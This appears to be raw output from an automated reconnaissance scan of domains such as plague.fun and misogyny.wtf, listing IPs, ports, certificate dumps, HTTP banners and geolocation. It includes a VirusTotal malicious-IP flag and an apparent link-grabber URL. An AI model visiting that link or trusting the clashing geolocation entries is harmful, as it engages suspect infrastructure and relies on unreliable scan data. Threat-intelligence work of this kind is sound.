104.21.7.179:8880 104.21.7.179 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 180.204.149.34.bc.googleusercontent.com 34.149.204.180 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun CN=*.plague.fun 2022-12-18 00:43:16 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.20] https://www.virustotal.com/en/ip-address/188.114.96.20/information/ 188.114.96.0/24 2022-12-18 00:08:45 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.96.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33bc1553b0a055e42aa7d864fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'404 Not Found', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'atlas.plague.fun', u'summary': u'Date: Fri, 04 Nov 2022 14:12:30 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ClqhVn5nSDtkklqr%2BmnSCvD9r8PWQF%2F88kiAg2dn43%2F57%2B43abjyeldwgPSlVgPWGi3Lnc3kXWmGp3tptIEJ4%2F6XT%2FcyMqiw%2FdFJnk7r%2FEt7i4KjB2lSsRxWQP2Geqr%2F2Jf"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764df1e8095ab83a-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 404 Not Found\n\ncf\r\n\n\n404 Not Found\n

Not Found

\n

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

\n\r\n0\r\n\r\n', u'time': u'2022-11-04T14:12:29.195922804Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987310280cb7d632b5845847c2f419e2c9ddaaedfc99512844cb8', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'73', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2022-11-30T17:51:41Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'bbb95c587c22383e98c0c76edbbfd861351749a07ae39c9d4d43a5aee78540b7', u'key_algo': u'ECDSA', u'not_before': u'2022-09-01T17:51:42Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'api.plague.fun', u'summary': u'Date: Sun, 23 Oct 2022 16:38:46 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 73\r\nConnection: close\r\naccess-control-allow-origin: *\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wmCFw%2FYqj8604vOuoCeM2hBuifGq6KtOhHeKBOWsRA%2B54NPwmSqyfGIPk6jRMMW5tGyxQs7ve%2BDWPe8fFcjhv%2Fa9mWikvGufQUCzHDENLFGws4wis6UMHPbfqGd6lapb9w%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 75ebe7a87fadcaa9-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n# Roses are red\n\n# Violets are blue\n\n# You are a skid\n\n# Nobody likes you', u'time': u'2022-10-23T16:38:44.953959619Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'2a06:98c1:3120::3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'2a06:98c1:3120:0:0:0:0:0/46'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68625d295855d87ce36c4e05e9', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://plague.fun/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Sun, 30 Oct 2022 20:20:51 GMT\r\nLocation: https://plague.fun/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=p0niSQHcHJYrt94pMK%2FWr74YUZs%2BvcDsHR4GVggs7kEqo8GFbUOH1p8yewavJYpzdeRdgmQf7L%2B0bs%2B3tFNCNgz%2Fk3qh0PO2FjpU4p6sNMeUApthX75f68Yi1FZpoayqhhh1HsoOYqPg"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 762682b70a0ccabd-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-10-30T19:20:50.988305392Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33c3c26f3899c099bd7684b50a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Plague', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\ 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 20.226.83.185 2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:8080 188.114.97.0 2022-12-18 00:16:52 Software Used Yes Tool - Wappalyzer 0 0 2 0 None Sectigo webmail.zerotwo-best-waifu.online 2022-12-18 00:07:01 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2c:85:5d:bb:57:90:dc:e7:0e:c1:fb:19:64:4d: ed:ef:1a:0f:25:57:66:e4:78:e3:5f:76:69:98:83:4f:9e:d6: 0e:92:0e:dc:62:fc:84:10:12:13:a6:68:99:e0:70:95:02:30: 43:a3:8d:79:ff:59:63:32:3d:8c:92:53:12:59:3a:b1:60:01: 58:91:c2:32:0d:d7:e9:cb:b7:70:ff:a3:a2:56:80:bd:93:6a: 54:5c:52:12:8b:bd:3b:4e:9b:aa:4c:e2 misogyny.wtf 2022-12-18 00:09:32 Co-Hosted Site No HackerTarget 0 0 2 0 None distighrufcirawsdisr.tk 104.21.28.240 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77a96313b8e390fe-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.1 2022-12-18 00:20:49 Netblock Membership No Censys 0 0 1 0 None 51.103.0.0/16 51.103.210.236 2022-12-18 00:03:11 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.241 81.88.52.232 2022-12-18 00:02:55 IP Address No Mnemonic PassiveDNS 42 0 1 0 None 81.88.52.232 zerotwo-best-waifu.online 2022-12-18 00:02:56 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:50:42:ff:9a:7a:0a:ec:db:51:55:79:18:dd:8f:ed:52:b0 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jan 8 17:50:30 2022 GMT Not After : Apr 8 17:50:29 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ac:b0:17:a9:7b:51:da:31:7f:8f:00:19:b7:3b: 98:64:90:41:83:01:ae:da:c8:aa:ac:d4:17:62:2b: f9:44:4e:05:5a:c8:20:ef:dc:a2:f3:45:78:3a:ed: af:b0:2e:06:e9:62:bd:f4:43:71:b4:d3:b3:eb:3a: 9b:77:69:ad:57:fc:60:7d:16:9c:b5:f7:25:94:e1: d6:18:0a:b4:34:e5:56:64:cc:e2:54:4f:50:e0:38: 81:9d:d7:46:81:ca:56:b5:53:ad:f7:4c:ec:d0:48: 14:8e:09:3d:e6:af:c3:a5:c9:12:3c:1d:64:d4:9c: c3:59:ad:d4:5a:90:12:14:ee:34:d6:07:da:98:71: 90:50:14:13:80:f5:4a:58:eb:3a:b7:cf:cc:11:3d: 17:0b:fd:11:95:39:4c:00:a7:3e:c8:28:36:88:a4: 5a:c3:63:19:a5:30:8d:fb:f6:75:72:a1:28:62:08: ad:b5:a6:ec:e6:7c:06:10:f1:0e:9d:91:27:6a:1f: 94:91:88:4b:5b:e5:39:a6:d1:08:1c:fe:26:bf:6d: 75:5a:be:c5:92:fe:2c:75:45:5f:45:87:11:0e:32: 54:cc:4c:c8:27:b5:05:6f:bc:c5:7b:a3:f9:a5:6e: eb:b2:1c:a1:62:b9:c5:09:cd:81:eb:42:27:b7:b3: 09:af Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5A:40:9D:CB:29:61:19:0B:49:48:24:70:A0:AC:F1:60:B9:77:E4:E6 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Jan 8 18:50:31.079 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:ED:1F:02:55:07:04:9B:33:8A:18: 9E:EC:35:86:59:0D:51:53:39:C3:BB:CC:BA:B4:73:87: 9B:09:AF:10:EC:02:20:0C:21:C1:58:B9:D7:D0:11:02: 53:1B:55:34:76:64:E6:F0:77:DB:72:E8:17:F2:55:75: EA:77:35:10:C3:E9:2B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jan 8 18:50:31.428 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:4B:56:BC:EE:D0:F8:1A:2B:3F:80:F9:7E: 97:8D:72:37:04:9C:3B:A1:90:56:11:BD:DA:1A:00:5D: 17:6A:21:7E:02:20:58:96:51:0D:94:2E:16:50:61:E8: 7C:92:97:45:2D:D9:92:71:00:CA:64:D8:4C:49:D5:01: 9B:CC:4E:EA:8D:9D Signature Algorithm: sha256WithRSAEncryption 2c:00:7d:72:58:4f:d1:2f:6c:10:e5:f1:b0:20:f7:03:55:a0: 76:08:e4:be:c1:4d:8c:a9:01:c3:9c:31:29:8b:67:61:92:af: 7f:01:a7:98:77:9d:41:9b:c6:6a:a7:d4:87:b0:c6:2a:6e:b2: 93:a8:59:22:29:14:c8:c4:1c:b8:85:56:bd:a3:04:4a:a6:7c: 5a:3d:fc:76:55:4e:2b:05:58:c7:a6:e2:8c:25:27:c5:b2:a4: 7b:2e:58:c7:6b:bd:23:e1:30:bb:5e:18:f7:82:24:69:da:f7: 95:a3:a6:2a:18:55:00:b9:54:08:f8:d3:d5:35:2f:98:a2:7c: 0d:a4:4b:12:9b:8b:6a:31:87:72:1f:09:83:a3:3a:33:8f:a6: 6b:ce:27:fc:0e:38:13:77:f9:79:f9:ca:d2:f2:0f:36:2b:c8: 23:28:38:4b:eb:8e:db:6e:b9:36:48:d9:d5:08:13:77:19:4d: 06:ca:4f:72:22:42:f3:bd:35:78:01:0f:a6:cd:3a:29:b4:49: fc:8e:2c:32:32:50:12:1e:81:b8:2a:d7:c7:63:63:29:25:9d: df:b3:65:87:1a:15:13:5b:e4:c1:12:a9:c6:3e:65:5a:18:83: 7d:88:88:ec:8d:41:62:f3:f5:77:5e:7c:ab:2e:48:36:b7:b7: 13:e4:41:b3 plague.fun 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.96.1 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.1 2022-12-18 00:12:41 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.169.215', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.169.215 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 55 2nd PMO (Net ID: 00:01:21:10:85:60) 37.780462,-122.390564 2022-12-18 00:08:25 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 41:cf:04:f8:c0:f2:7b:cd:70:73:3f:d3:40:5f:a0:ad Signature Algorithm: sha384WithRSAEncryption Issuer: C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA Validity Not Before: Jun 20 00:00:00 2022 GMT Not After : Sep 18 23:59:59 2022 GMT Subject: CN=zerotwo-best-waifu.online Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:97:9f:f2:3b:4c:62:dd:0e:a0:54:9a:a0:10:cd: ac:59:0c:51:1f:9c:dc:da:36:55:a1:c5:dd:3e:e0: b8:05:89:90:60:39:6a:76:93:69:bc:6f:7d:89:ce: f3:16:25:e0:bb:64:27:32:fc:da:e6:56:30:d1:7e: 5b:3e:28:4d:f1:b0:a0:56:ee:0a:bc:a5:39:af:e6: 13:f5:d6:79:19:a8:12:72:09:bf:5e:64:84:12:63: cf:77:47:49:c9:12:10:fc:f7:ff:a6:1a:0d:f2:b1: 79:fd:59:41:1c:fa:7c:f0:a2:99:89:29:45:b4:3c: 6c:d7:f9:35:3d:b0:c7:85:55:53:9a:ad:7e:11:22: 60:ec:39:30:8f:a5:cf:b5:29:82:d4:26:f7:0d:05: b7:61:07:0f:a8:4a:bc:60:a5:e9:c1:c5:13:1d:a6: 64:a0:78:f9:0d:b3:11:5a:bc:74:aa:07:7d:be:d9: f2:82:44:6a:ff:00:bd:e0:9b:e6:be:35:1a:2a:77: c4:91:36:75:14:26:8c:bd:4f:8f:0b:10:fd:77:e1: 68:19:26:e2:67:71:60:17:2a:b3:f0:2d:94:68:b0: 19:4e:6e:c9:38:b4:f5:c9:51:42:82:38:5c:0a:25: 10:26:da:fe:41:d1:53:ce:63:9d:8d:0b:8f:db:2a: 9d:d9 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Authority Key Identifier: keyid:C8:D9:78:68:A2:D9:19:68:D5:3D:72:DE:5F:0A:3E:DC:B5:86:86:A6 X509v3 Subject Key Identifier: D5:ED:E6:A1:33:4E:CF:0F:7C:8A:16:5B:B4:C5:26:5E:D2:66:E3:B8 X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Basic Constraints: critical CA:FALSE X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Certificate Policies: Policy: 1.3.6.1.4.1.6449.1.2.2.78 CPS: https://sectigo.com/CPS Policy: 2.23.140.1.2.1 Authority Information Access: CA Issuers - URI:http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt OCSP - URI:http://zerossl.ocsp.sectigo.com CT Precertificate Poison: critical NULL X509v3 Subject Alternative Name: DNS:zerotwo-best-waifu.online, DNS:www.zerotwo-best-waifu.online Signature Algorithm: sha384WithRSAEncryption 4e:e8:80:5f:56:bd:7f:d5:c9:aa:99:c0:9b:14:e5:da:dd:87: 43:6a:40:c4:de:06:c4:9c:24:b5:f5:67:55:c6:64:ed:f4:e0: 80:0b:b5:2f:f7:02:a1:41:fc:bf:0b:f7:4e:9b:20:9f:e7:54: fa:92:38:82:2f:00:56:12:1b:a4:5b:aa:ae:2f:aa:d7:cd:d0: df:ba:ba:a3:c3:1e:c8:90:de:d4:16:ff:1e:4e:b6:13:53:d2: 47:a5:5d:4a:16:c0:15:4d:ad:03:83:6e:26:7e:e3:96:95:64: 6a:c4:04:44:16:bf:a8:de:0c:9e:6f:3e:35:50:cc:04:48:a8: 40:08:06:7a:0c:ee:00:70:03:eb:a1:8d:30:c1:0e:57:9a:65: 9b:81:25:38:5a:96:51:de:af:bc:98:9f:fa:29:62:1c:9b:79: 84:b9:ef:b4:0f:30:af:23:93:3f:79:36:cc:37:10:d1:a6:97: 02:60:5e:ea:40:36:2d:97:7c:20:1d:c8:28:fb:f6:17:bc:3a: e7:b0:c6:00:08:29:05:df:ef:4a:58:87:62:11:49:15:81:c3: 0d:f5:22:e7:8b:2e:70:0d:39:52:46:4f:a9:9a:ed:c7:9f:57: f1:88:02:bf:3e:d2:ef:35:e6:c2:a8:f4:64:68:3c:3d:c4:22: 22:64:21:26:bb:dd:1c:78:9b:34:a4:0b:0a:7c:78:c0:4a:fe: 81:b6:59:6e:d8:9b:db:bf:f8:bb:98:28:a9:0d:30:dc:a3:00: fe:4b:c7:59:3d:d3:94:4a:39:3c:00:fe:7c:c8:2d:69:0d:47: 6c:5d:20:75:e6:9b:b2:11:94:70:13:ea:ee:9f:8f:dc:aa:25: 3c:43:c3:ad:c3:40:19:ef:a8:fb:4b:4e:73:4c:9a:7b:c5:a5: 09:33:df:42:95:71:29:98:eb:0d:e1:f2:88:58:76:3f:3f:cc: 6e:bb:1a:f8:c1:a2:05:c9:8d:0c:09:74:8b:cd:d2:24:d8:47: ea:61:a5:04:7e:45:83:3b:5b:c3:17:4a:74:26:a8:ed:b0:83: 48:dd:58:ac:47:c8:a5:2c:ab:ad:e4:d1:c8:ef:a1:ee:97:e8: a3:9e:cd:35:18:8b:2c:dd:43:89:b5:11:bd:83:50:fb:4d:32: 50:d4:70:24:a4:4a:05:87:1a:cb:63:7d:d6:b8:2f:0e:c8:cd: 9d:df:9d:c8:f7:f0:f7:50:5e:5f:4b:40:3c:16:09:0a:67:23: 9f:bf:d8:ac:ba:d0:16:f2:c6:2d:72:88:1a:c8:cb:cd:67:b8: 65:1e:82:a3:13:cf:83:95:d5:6e:5d:41:90:19:39:fa:f6:88: 1b:b0:5a:76:48:6f:57:59 zerotwo-best-waifu.online 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a7ca0aad962ca3-ORD Content-Encoding: gzip 188.114.96.1 2022-12-18 00:08:36 Physical Location No LeakIX 0 0 1 0 None Amsterdam, North Holland, Netherlands 137.117.157.128 2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.97.3 2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acversing.cf 172.67.147.230 2022-12-18 00:37:18 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.xen.prgmr.com plague.fun 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2087 104.21.28.240 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aa8b4c1a15036c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:08:41 Open TCP Port No LeakIX 0 0 1 0 None 40.113.112.131:80 40.113.112.131 